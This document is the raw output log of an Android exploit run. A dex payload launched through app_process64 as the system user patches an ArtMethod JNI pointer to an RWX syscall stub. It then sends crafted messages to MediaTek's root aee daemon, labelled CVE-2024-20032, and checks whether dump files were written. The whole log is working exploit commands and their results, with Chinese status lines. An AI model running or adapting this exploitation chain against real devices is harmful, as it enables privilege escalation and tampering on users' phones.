command=CLASSPATH=/data/data/com.android.settings/cache/apusys_ioctl_probe.dex app_process64 /system/bin AeeSessionProbe --socket=com.mtk.aee.aed_64 --ind=11 --class=4 --payload
probe=aee-session
dex_md5=a41ffab5cc2d2ad03e146e48b9f5bc3c
dex_sha256=d1572f8085f0f2807f4eee18241f2f08dc9ff1c4f5556d006fa9023a1fe5da70
remote_dex=/data/data/com.android.settings/cache/apusys_ioctl_probe.dex
shell_port=127.0.0.1:48888
exit_status=0

uid=1000(system) gid=1000(system) groups=1000(system),3003(inet) context=u:r:system_app:s0
u:r:system_app:s0
a41ffab5cc2d2ad03e146e48b9f5bc3c  /data/data/com.android.settings/cache/apusys_ioctl_probe.dex
[AeeSessionProbe] CVE-2024-20032 session driver
[AeeSessionProbe] uid=1000 pid=28976 target_pid=28976 class=4 ind=11 flags=0x0 payload=true
[+] Scratch buffer at 0x7f842d7000
[*] Trying anonymous PROT_RWX mmap...
[+] Anonymous RWX page at 0x7f842d6000
[+] Wrote syscall stub: JNI@+0x00 (36B), call stub JNI@+0x80 (40B); entry_point left untouched
[*] ArtMethod for nativeSyscall at 0x7f7f831c88
    access_flags = 0x10000108 [NATIVE]
    data (JNI ptr) = 0x7cd421a2c0
    entry_point    = 0x1038000800cfc578
[*] Patching data_ (JNI) → 0x7f842d6000
    data_       = 0x7f842d6000 ✓
    entry_point = 0x1038000800cfc578 (unchanged)
[+] ArtMethod patched
[+] Syscall infrastructure ready

[session] @com.mtk.aee.aed_64 connected peer_uid=0
[session] IND ind=11 class=4 pid=28976 flags=0x0 payload=14
[session] IND bytes: 02 00 00 00 0b 00 00 00 30 71 00 00 04 00 00 00 0e 00 00 00 00 00 00 00
[session] JE 2nd-IND payload=139
[session] REQ#0 type=2 cmd=16(IND_LOG_CLOSE) seq=0 payload=0
[session] daemon IND cmd=16(IND_LOG_CLOSE) — session CLOSED
[session] no REQs on @com.mtk.aee.aed_64 (daemon may need crash state)

[phase-check] /data/vendor/aee_exp/
[dump_check] 开始轮询转储目录（最多45秒）...
[dump_check] /data/vendor/aee_exp: 0 个已有条目
[dump_check] /data/vendor/core: 0 个已有条目
[dump_check] /data/vendor/dumpsys: 0 个已有条目
[dump_check] /data/tombstones: 0 个已有条目
[dump_check] /data/anr: 3 个已有条目
[dump_check] ★★★ 新文件: /data/anr/trace_00  age=0s
[dump_check]   size=289555B
[dump_check] ★★★ 新文件: /data/anr/trace_01  age=1s
[dump_check]   size=120985B
[result] DUMP_WRITTEN=YES ★ aee_dumpstate 写入了转储文件！
